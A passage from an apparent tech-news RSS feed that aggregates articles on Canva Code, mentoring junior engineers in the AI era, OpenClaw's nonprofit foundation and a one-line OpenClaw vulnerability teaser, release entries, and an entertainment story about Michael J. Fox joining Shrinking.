Canva's HTML import feature could turn it into a 'finishing layer' for every AI coding tool</b></h3><p>One of the most strategically interesting features in <a href="https://bolt.new/">Canva Code 2.0</a> is its HTML import capability, which allows users to take code generated by any AI tool — including <a href="https://chatgpt.com/">ChatGPT</a>, <a href="http://claude.ai/">Claude</a>, <a href="https://lovable.dev/dashboard">Lovable</a>, or <a href="https://bolt.new/">Bolt</a> — and bring it into Canva as a fully editable design. The implication is unmistakable: Canva is positioning itself as the place where AI-generated code gets its finishing touches, regardless of where it was originally created.</p><p>When asked directly whether this amounts to positioning Canva as a "finishing layer on top of vibe coding," Wu offered a diplomatic but revealing response. "It's really a continuation of our goal to make all design as easy as possible," he said. "We've supported importing PDFs and translating them into docs, importing PowerPoint files — so in one way, it's an expansion of that. But in another way, it's really just listening to what our users want and making Canva both the most useful and the most compatible platform.”</p><p>He paused, then added: "It's not that we're deliberately positioning ourselves as a specific layer, say like a finishing layer after vibe coding. We just really want to make our platform the most accessible and the most pluggable."</p><p>That language — "most pluggable" — suggests a platform strategy that doesn't require Canva to win the AI code generation race outright. If Canva becomes the default destination for making AI-generated code look professional and on-brand, it captures value from the entire category regardless of which code generation engine users prefer. The strategy also echoes the broader import capabilities that already allow Canva to ingest PowerPoint decks and PDFs from competing platforms, gradually pulling users deeper into the Canva ecosystem without demanding they abandon existing workflows.</p><h3><b>What Canva Code can build — and where Danny Wu says it hits its limits</b></h3><p>Wu was notably candid about the product's boundaries — a refreshing departure from the typical Silicon Valley product launch. "Canva Code is great for anything that works as a front-end app, and it's especially good when you want to leverage data, data submissions, and interactivity at small to medium scale," he said. "I'll be honest about the limitations. Canva Code is probably not going to be suitable if you're trying to build a website with complex backends, or if you're handling hundreds of thousands of visitors per day."</p><p>This candor effectively draws a line between <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> and the more ambitious platforms in the space. While Lovable and Replit are pushing toward full-stack application development — complete with databases, authentication, and production-grade hosting — Canva is deliberately limiting its scope to interactive front-end experiences at modest scale. The question is whether that's a strategic weakness or a disciplined focus. For the teachers, small business owners, and marketing teams that make up the bulk of Canva's user base, complex backends and high-traffic scalability are irrelevant concerns. What matters is whether they can create an interactive event page, a property listing website, or a classroom hub that looks professional and works on mobile — without hiring a developer or learning a new tool.</p><p>When asked about the AI models powering <a href="https://www.canva.com/ai-code-generator/">Canva Code</a>, Wu confirmed the company uses a combination of proprietary and third-party models, including those from OpenAI and Anthropic, but declined to specify the exact mix. "We don't share the exact mix, and it does change over time," he said. "We also route differently depending on what you're asking for and which model family we think is best for handling certain requests."</p><h3><b>Canva's AI acquisition spree — from Affinity to Leonardo.ai — now powers its vibe coding push</b></h3><p>Canva's broader AI infrastructure has been significantly bolstered by an acquisition strategy that has accelerated over the past two years. In March 2024, <a href="https://www.canva.com/newsroom/news/affinity/">the company acquired Affinity</a>, the British creative software suite popular with Mac users, in a deal that Bloomberg reported was valued at "<a href="https://www.bloomberg.com/news/articles/2024-03-26/canva-acquires-affinity-design-suite-in-push-to-rival-adobe">several hundred million pounds</a>." Canva at the time positioned the deal as a way to compete with Adobe's flagship products — Illustrator, Photoshop, and InDesign — by gaining ownership of Affinity's Designer, Photo, and Publisher applications.</p><p>Just four months later, Canva acquired <a href="http://leonardo.ai/">Leonardo.ai</a>, an Australian generative AI startup with over 19 million registered users and more than a billion images generated. Canva co-founder Cameron Adams said at the time that Leonardo.ai's technology would be integrated into Canva's Magic Studio generative AI suite.</p><p>Together with these acquisitions, <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> is the company's attempt to layer interactive, code-driven capabilities on top of a visual design platform that has already been enhanced by professional-grade design tools and generative AI models. The company reports over 32 billion uses of its AI products to date — a staggering figure that underscores how deeply AI is now woven into everyday Canva workflows, even for users who may not think of themselves as using artificial intelligence.</p><h3><b>Six million sites published, but Canva's retention data remains an open question</b></h3><p>Canva's announcement highlights an impressive traction metric: users have created and published more than six million websites using Canva Code since the feature was first introduced a year ago. But the number deserves scrutiny.</p><p>Wu clarified in the interview that the six million figure represents published websites over the past year — meaning sites that were either made public or shared via password-protected or private links. "They may have published publicly, or behind a password, or as a private link. But that's the number of published websites," he said.</p><p>When asked about active retention — how many of those sites are still live and being maintained — Wu acknowledged the gap in his data. This is a meaningful distinction. In the vibe coding market, raw creation numbers can be misleading because the barrier to generating a site is so low. The more telling metric — which Canva does not yet provide — would be how many of those six million sites receive regular traffic or have been updated after initial publication.</p><p>The early use cases, however, suggest genuine utility beyond novelty. Educators and school administrators are using Canva Code to build classroom hubs, with one teacher creating bespoke webpages for each of their classrooms to keep students and parents updated on announcements. Small businesses, like Alt Marketing School, have built mini apps for fundraising training and interactive roadmaps for their members. For World Book Day, 50 readers created educational games across different subjects, complete with pedagogical guides for classroom use.</p><h3><b>Canva Code pricing, data governance, and what enterprise customers need to know</b></h3><p><a href="https://www.canva.com/ai-code-generator/">Canva Code 2.0</a> is available across all of Canva's pricing tiers, including its free plan — a notable decision given that competitors like Lovable, Bolt, and Replit reserve their most capable features for paid subscribers. "As you go from, say, free to pro to business to enterprise, you would get more AI credits and be able to have higher usage of Canva Code," Wu said. "But it is available and it is usable — even free Canva accounts as well as education and not-for-profit accounts."</p><p>This credit-based approach mirrors the pricing evolution happening across the entire vibe coding category, where platforms have converged on token or credit systems that meter AI generation capacity rather than gating features behind subscription tiers. The difference is that Canva's free tier serves as an acquisition funnel for a much larger design platform, not just for the coding feature itself.</p><p>For the institutional customers Canva increasingly courts — school districts, real estate brokerages, enterprise marketing teams — data governance is a threshold concern. Wu addressed this directly. "All users and customers have full control over how their data is used," he said. "They can choose whether their prompts and data are used for AI training in the settings. For businesses and enterprises, team admins can manage this at the organizational level and guarantee that their inputs, content, and outputs won't be used for training." This opt-out approach reflects a lesson the broader industry has learned the hard way. As The Verge reported when Canva acquired Leonardo.ai, Adobe suffered significant backlash over a policy update regarding user data and AI model training — a controversy Canva appears keen to avoid.</p><h3><b>Canva's long-term vision: closing the gap between imagination and what non-technical users can actually build</b></h3><p>When asked where <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> fits into the company's long-term trajectory — and whether Canva is building toward a full-stack app development platform — Wu steered the conversation back to the company's core audience.</p><p>"A huge part of it is reducing the gap between your imagination and what's possible, especially for everyday users — people who don't have a lot of time," he said. "They don't have time to figure out deploys or MCPs or APIs. They just want to design more interactive and more dynamic communication."</p><p>He pointed to the rapid improvement in AI model capabilities as a key accelerant. "The kind of things you can create today in one shot — like a 3D visualization of a solar system — you really couldn't have trusted the output a year ago. But today, you have a really high success rate."</p><p>Whether <a href="https://www.canva.com/ai-code-generator/">Canva Code</a> becomes a durable product category or a feature that gets absorbed into the platform's broader AI workflow will depend on how quickly the company can close the gap between its current front-end focus and the full-stack capabilities that increasingly define the competition. Lovable is shipping Supabase-backed apps with authentication and databases built in. Replit's agents can execute autonomous long-running builds. Bolt.new runs entire Node.js environments in a browser tab. These are fundamentally different ambitions than making a conference landing page look good.</p><p>But Canva has never won by matching the technical depth of its competitors. A decade ago, it didn't try to out-feature Adobe — it made design accessible to the 99 percent of people who would never open Photoshop. Now, in a vibe coding market where every tool can generate a working prototype from a prompt, Canva is making the same wager it made in 2012: that for most people, the hardest part was never the building. It was making it look like it came from you.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How do you go from junior to staff engineer when AI writes the code?]]></title>
<description><![CDATA[A few weeks ago, a new hire at Aviator, fresh out of college, asked me a question I didn’t have a clean answer to. How do I become a senior engineer, or even a staff engineer? What should I learn, and how?



It’s a fair question and a harder one to answer than it was just a year ago.



The path...]]></description>
<link>https://tsecurity.de/de/3667712/it-security-nachrichten/how-do-you-go-from-junior-to-staff-engineer-when-ai-writes-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667712/it-security-nachrichten/how-do-you-go-from-junior-to-staff-engineer-when-ai-writes-the-code/</guid>
<pubDate>Tue, 14 Jul 2026 13:08:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A few weeks ago, a new hire at Aviator, fresh out of college, asked me a question I didn’t have a clean answer to. How do I become a senior engineer, or even a staff engineer? What should I learn, and how?</p>



<p class="wp-block-paragraph">It’s a fair question and a harder one to answer than it was just a year ago.</p>



<p class="wp-block-paragraph">The path used to be well-known. As a newly hired junior software engineer, you were given an experienced mentor who would assign you simple tasks to learn the ropes. You’d write some code, ask plenty of questions, open a pull request, get feedback in code review, think about it and fix your code. Rinse and repeat that a few hundred times. The tasks became more complex; the feedback got shorter and along the way you’ve been building judgment, the thing that separates a senior engineer from a junior one.</p>



<p class="wp-block-paragraph">Now AI writes most of the code. The loop looks different and the easy assumption is that it’s broken: fewer tasks for juniors to cut their teeth on, an agent fixing the code that another agent wrote, thinner path to judgment.</p>



<h2 class="wp-block-heading"><a></a>Mentoring got easier, not harder</h2>



<p class="wp-block-paragraph">I knew just the person to ask: how do we grow senior and staff engineers in the AI era? Adam Berry is a staff engineer at Netflix, a member of <a href="https://dx.community/">The Hangar</a>, our community of engineering leaders, and someone I have been discussing the evolving role of code review and <a href="https://www.cio.com/article/4179485/ai-killed-the-code-review-what-happens-to-knowledge-sharing.html">knowledge sharing</a> for a while now. He spends his time on getting AI adoption right, rather than just fast, in their engineering organization and has been working out the question of growing new engineers in practice. Mentoring juniors in an agentic world, Adam says, isn’t harder; it’s embarrassingly easy.</p>



<p class="wp-block-paragraph">“You grow juniors and help them become better engineers the same way you always did. AI isn’t changing the methodology. It’s changing the details,” he told me. His point is that the agentic world gives a lot more options for giving juniors bounded tasks to work on and more feedback. The scattered remarks and comments seniors used to give in person now can be put into instructions and guardrails.</p>



<p class="wp-block-paragraph">Adam breaks working with agents into three foundational skills:</p>



<ul class="wp-block-list">
<li>If you don’t know how to do something with the agent, ask the agent.</li>



<li>If the agent does something you don’t like, figure out how to correct it and then codify it so it doesn’t happen again.</li>



<li>Your sense of when the agent has gone off the rails.<br><br></li>
</ul>



<p class="wp-block-paragraph">“Most juniors can pick up the first two on their own. On the third one, they need guidance, he says.<br><br></p>



<p class="wp-block-paragraph">His process for building it is staged. “The stages are about growing scope. First, you give a junior engineer a well-specified task—and these are now bigger than what you’d have given a junior before. You can give them task definitions that are like a prompt and instructions to drive that prompt, make sure they got to a good plan, make sure they understood the plan, and that they thought through the test cases, etc.<br><br>Then gradually you peel off some of that specificity so they have to build the muscle themselves. Once they’ve gotten good at that level of scope, they’re ready to work on larger scoped problems.”<br><br>Starting from more specific problems and going towards ambiguous problems is the definition of growing as an engineer.</p>



<h2 class="wp-block-heading"><a></a>Pair programming with the agent in the room</h2>



<p class="wp-block-paragraph">Seniors can still do pairing sessions with juniors, now with the agent in the room.<br><br>“In the pairing session, the earlier-career engineer should be the one driving. The agent can be set up to interrogate the junior rather than just answer them. None of you is manually writing code, but you’re still doing pair programming and mentoring. Even if it’s just a trivial bug fix, if you guide a junior through it, it forces them to do just that little bit of thinking.”<br><br>Adam says mentoring juniors today does not have to mean forcing them to write code manually. Seniors should teach them the process of agentic engineering, and that’s exactly what they should focus on during the pairing sessions. The habit he wants to be installed early is asking for options instead of answers.<br><br>“I aim to teach juniors to ask for options and think through them, even on small tasks. I ask them to explain what their input to the AI tool was that led to the code they got. But I’d also show them how I would have done the same thing.”<br><br>The pairing produces artifacts as it goes. “That’s where you get into conversations of, ‘This is why that wasn’t quite it for me,’ and if I see that that’s not baked into the repo, I’m going to add this into the ADR, into the design, into the instruction set. I’ll codify that so the junior gets it too, and they know why it exists, because they watched me go through it with the tool myself.”</p>



<p class="wp-block-paragraph">That reshapes the code review instead of removing it. Making that work puts more on senior engineers, not less. “Senior engineers need to ensure that things like ADRs, or whatever system you use, are properly encapsulated in the repo for both the agents and the humans to consume.” His team also attaches the prompts to the pull request and has the agent summarize what it did against what the prompt asked.<br><br></p>



<p class="wp-block-paragraph">Adam also teaches junior engineers how to bring in expert sources from outside into AI tools. He’ll point an agent at a book like Michael Feathers’ <em>Working with Legacy Code</em> as an example of what quality code looks like and have it work from the concepts directly.</p>



<h2 class="wp-block-heading"><a></a>Don’t outsource the thinking</h2>



<p class="wp-block-paragraph">His arguments make sense, but I also recently came across <a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=11363384">research</a> examining the influence of AI tools on how and why members of software engineering teams interact. Their finding was not surprising: of the 131 surveyed developers, 51% said they now ask GenAI for technical help they once would have asked a person, and 62% said it was easier to ask GenAI without fear of embarrassment.</p>



<p class="wp-block-paragraph">When a junior gets stuck now, their first move usually isn’t to message a senior on Slack. It’s to ask the agent. This is also the case in code reviews. The purpose of code reviews was always <a href="https://www.cio.com/article/4179485/ai-killed-the-code-review-what-happens-to-knowledge-sharing.html">knowledge sharing </a>as much as it was a quality gate. What I see junior engineers do now is take the feedback and, without reading it closely, hand it straight to the agent to resolve. The part where they would have to understand how their work differed from what the senior expected disappears. It got passed from the reviewer to the agent, and the junior skipped the understanding.</p>



<p class="wp-block-paragraph">This isn’t really the junior’s fault. They need the motivation and the space to do it differently, and the default pattern under delivery pressure is to push the thing out and worry about it later.<br><br>The same research showed that developers turned to colleagues with questions about context (65% to clarify business logic or requirements, 50% for how something had been done before).</p>



<p class="wp-block-paragraph">Respondents were also aware of the trap that Berry’s approach was created to avoid: AI tends to hand back a single answer, compared to multiple perspectives a colleague surfaces and they kept seeking teammates for context-specific expertise, mentorship and plain social connection.</p>



<p class="wp-block-paragraph"><br>The fix is almost mechanical: if you have to make a choice, you have to think about it. I do this in my own product thinking. Most of it happens by bouncing ideas off Claude, but whenever something is complex, I make myself lay out a few options, trade them against each other and decide which direction to take. That’s the same move Berry wants juniors making, and it’s what builds judgment, whether you’re twenty-two or forty.</p>



<h2 class="wp-block-heading"><a></a>Why we should still hire juniors</h2>



<p class="wp-block-paragraph">There’s also a hiring question underneath all of this. We recently hosted Kent Beck, an industry legend, at <a href="https://dx.community/">the Hanga</a>r in a session we called “Juniors FTW,” and his reasoning was that the industry is being remade fast enough that being new is an advantage. Juniors are too new to have absorbed what everyone “knows” is impossible, which leaves them less biased, more creative and carrying fewer preconceived mental barriers.</p>



<p class="wp-block-paragraph">Beck also <a href="https://newsletter.kentbeck.com/p/hey-n00b-we-didnt-hire-you-to-complete">wrote</a> about how important it is to hire juniors without the calculation of how many tasks they can perform.<br><br>“If all we cared about was today’s productivity, we wouldn’t have hired you at all. Instead, we (the seniors) are focused on the future: we know there’s going to be far more work here than we could possibly accomplish. We are paying your salary now as the option premium on the engineer you will become. If we play this game right, we’ll have a kick-ass next generation of engineers. If not, we’ll have to be doing the same engineering jobs ten years from now, and we really don’t want to be doing that.”</p>



<h2 class="wp-block-heading"><a></a>The pipeline is thinning</h2>



<p class="wp-block-paragraph">The trend is running the other way. Entry-level hiring at the 15 biggest tech firms fell 25 percent from 2023 to 2024, according to a <a href="https://www.signalfire.com/blog/signalfire-state-of-talent-report-2025">report from SignalFire</a>. In a recent <a href="https://stackoverflow.blog/2025/12/26/ai-vs-gen-z/">survey of engineering leaders</a>, a majority said they plan to hire fewer juniors, on the logic that AI lets seniors cover more ground.</p>



<p class="wp-block-paragraph">That logic is short-sighted in a specific way. Senior engineers don’t appear from nowhere. They’re the juniors someone hired five or ten years ago and invested in mentoring them. Stop hiring and growing juniors now, and the gap doesn’t show up this year. It shows up later, when the industry needs people with the judgment that only comes from years of making mistakes and recovering from them and finds it stopped producing them.</p>



<p class="wp-block-paragraph">So, here’s the answer to the question that the new hire asked: the path to senior and to staff is the same path it always was. You grow the range of ambiguity you can handle, and you stay honest about the part you can’t handle yet. What changed is the interface. The agent writes the code. Your job is to keep asking questions to your colleagues and the agents and keep doing the thinking until the thinking is good.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Drei OpenClaw-Lücken erlauben Host-Ausbruch via WhatsApp]]></title>
<description><![CDATA[Drei Schwachstellen im KI-Assistenten OpenClaw ermöglichen die vollständige Übernahme des Host-Systems über eine präparierte WhatsApp-Nachricht.

Tags: #Cyber Security | #Künstliche Intelligenz | #OpenClaw]]></description>
<link>https://tsecurity.de/de/3667015/it-security-nachrichten/drei-openclaw-luecken-erlauben-host-ausbruch-via-whatsapp/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667015/it-security-nachrichten/drei-openclaw-luecken-erlauben-host-ausbruch-via-whatsapp/</guid>
<pubDate>Tue, 14 Jul 2026 08:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920.jpg" class="attachment-full size-full wp-post-image" alt="OpenClaw" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2026/02/OpenClaw-Quelle-Robert-Way-Shutterstock-2733455235-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Drei OpenClaw-Lücken erlauben Host-Ausbruch via WhatsApp 1"></p>
    Drei Schwachstellen im KI-Assistenten OpenClaw ermöglichen die vollständige Übernahme des Host-Systems über eine präparierte WhatsApp-Nachricht.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a> | <a href="https://www.it-daily.net/thema/openclaw">#OpenClaw</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Mon, 13 Jul 2026 23:17:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1]]></title>
<description><![CDATA[OpenClaw 2026.7.1]]></description>
<link>https://tsecurity.de/de/3665369/downloads/v202671/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665369/downloads/v202671/</guid>
<pubDate>Mon, 13 Jul 2026 15:17:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.1</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Michael J. Fox Saw Harrison Ford in Shrinking and Knew He Had to Be Part of It]]></title>
<description><![CDATA[Michael J. Fox has revealed that Harrison Ford's performance as a character living with Parkinson's disease in Shrinking moved him so deeply that he immediately called co-creator Bill Lawrence and asked to be part of the series. That conversation led to Fox's return to acting for the first time s...]]></description>
<link>https://tsecurity.de/de/3663984/ios-mac-os/michael-j-fox-saw-harrison-ford-in-shrinking-and-knew-he-had-to-be-part-of-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663984/ios-mac-os/michael-j-fox-saw-harrison-ford-in-shrinking-and-knew-he-had-to-be-part-of-it/</guid>
<pubDate>Mon, 13 Jul 2026 02:08:39 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Michael J. Fox has revealed that Harrison Ford's performance as a character living with Parkinson's disease in Shrinking moved him so deeply that he immediately called co-creator Bill Lawrence and asked to be part of the series. That conversation led to Fox's return to acting for the first time since 2020, making his Season 3 appearance one of the show's biggest moments.



Speaking to the Los Angeles Times, Fox recalled his reaction after watching Ford's performance and said, "Bill, why the f*** am I not on the show?" His direct and humorous response quickly turned into reality, with the writers bringing him in as a guest star. In the Season 3 premiere, Fox plays another Parkinson's patient who meets Ford's character during a doctor's visit, and their first conversation mixes humor with genuine warmth.



Michael J. Fox praised Harrison Ford's honest performance



Speaking to Vanity Fair, Fox explained why Ford's performance stood out to him on such a personal level. He said, "I wasn't prepared for how much of his own understanding of the disease he brought to it. I mean, I recognized Parkinson's in his eyes. The things I was feeling, I recognized in the way he was expressing himself."



Fox added that Ford's work brought him to tears and praised the actor's subtle performance, calling it "so brilliant and so fun to work with." Ford shared similar admiration, describing Fox as "an extraordinarily powerful person."



The reunion also created excitement among the cast because it marked the first time Fox and Ford had shared the screen together. New episodes of Shrinking continue to arrive every Wednesday on Apple TV+.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1-beta.6]]></title>
<description><![CDATA[OpenClaw 2026.7.1-beta.6]]></description>
<link>https://tsecurity.de/de/3663917/downloads/v202671-beta6/</link>
